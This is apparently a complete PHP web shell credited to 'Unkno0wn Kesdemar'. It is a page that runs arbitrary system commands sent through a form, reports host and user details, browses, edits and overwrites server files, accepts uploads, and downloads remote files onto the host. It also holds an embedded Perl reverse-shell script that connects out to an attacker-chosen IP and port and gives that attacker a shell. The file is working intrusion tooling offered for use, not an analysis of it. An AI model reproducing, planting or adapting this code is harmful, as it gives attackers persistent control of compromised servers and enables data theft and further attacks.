<?

error_reporting(0);
?>
<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin:
0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #33669
9 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px
; color: #c0c0c0; background-color: #336699 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active {COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #DCE7EF;
SCROLLBAR-HIGHLIGHT-COLOR: #dbdbdb;
SCROLLBAR-SHADOW-COLOR: #598BB6;
SCROLLBAR-3DLIGHT-COLOR: #598BB6;
SCROLLBAR-ARROW-COLOR: #598BB6;
SCROLLBAR-TRACK-COLOR: #F4FAFD;
SCROLLBAR-DARKSHADOW-COLOR: #dbdbdb;
background-color: #336699;
}

fieldset.search { padding: 6px; line-height: 150% }

label { cursor: pointer }
form { display: inline }
img { vertical-align: middle; border: 0px }
img.attach { padding: 2px; border: 2px outset #000033 }
#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px s
olid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px s
olid #CBAB78; }
#logo { FONT-SIZE: 50px; }
</style>
<title>[ No Title ]</title>
<table "width="100%" height=100% bgcolor="#336699">
<tr><td align="center" valign="top">
<table><tr><td>
<?php
$dir = $_POST['dir'];
$dir = stripslashes($dir);
$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$bind = "
#!/usr/bin/perl
use Socket;
\$host = \$ARGV[0];
\$port = \$ARGV[1];

\$proto = getprotobyname('tcp') || die shit;

socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die shit;
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
print shit;
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
exec {'/bin/sh'} '-bash' ;
exit(0);
}
";
function decode($buffer){
return convert_cyr_string ($buffer, d, w);
}
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}
echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "F
ree space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";
if ($sertype == "winda"){
ob_start('decode');
echo "Version: ";
echo passthru("ver") . "<br><br>";
ob_end_flush();
}
if ($sertype == "other"){
echo "id:";
echo passthru("id") . "<br>";
echo "uname:";
echo passthru("uname -a") . "<br><br>";
echo "uptime:";
echo passthru("uptime") . "<br><br>";
}
if($_POST['post'] == "yes" and $HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name
"]);
}
if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
}
else

{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div><
/center>";
}
}
if ($_POST['installbind']){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl $installpath $ip $cbport");
chdir($dir);
}
if ($_POST['editfile']){
$fp = fopen($_POST['editfile'], "r");
$filearr = file($_POST['editfile']);
foreach ($filearr as $string){
$string = str_replace("<" , "<" , $string);
$string = str_replace(">" , ">" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $editfile </div><form action=\"$REQUE
ST_URI\" method=\"POST\"><textarea name=content cols=122 rows=20>$content</texta
rea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\"></form></center>";
fclose($fp);
}
if($_POST['savefile']){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";
}
if ($cmd){
echo "<center><textarea cols=122 rows=20>";
if($sertype == "winda"){
ob_start('decode');
passthru($cmd);
ob_end_flush();}
else{
passthru($cmd);
}
echo "</textarea></center>";
}else{
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td>Type</td><td>Size</td><td>Last access</td><td>
Last change</td><td>Perms</td><td>Write</td><td>Read</td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){

$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "
</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . dat
e("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td>"
. filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) .
"</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($
filename);
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
}
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\"></form>";
if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SA
FE MOD IS ON<br>
Including from here: "
. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec
_dir'). "</b></font>";}
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/for
m-data\">
Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/for

m-data\">
<INPUT type=\"file\" name=\"userfile\">
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
Install cb
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() .
"\">
<b>Ip</b><input type=\"text\" name=\"ip\" value=\"ip\">
<b>Port</b><input type=\"text\" name=\"cbport\" value=\"3333\">
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\"></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";
?>
</td></tr></table>
</td></tr>
<tr valign="BOTTOM">
<td valign=bottom><center>
Coded By Unkno0wn Kesdemar :D
</center></td>
</tr>
</table>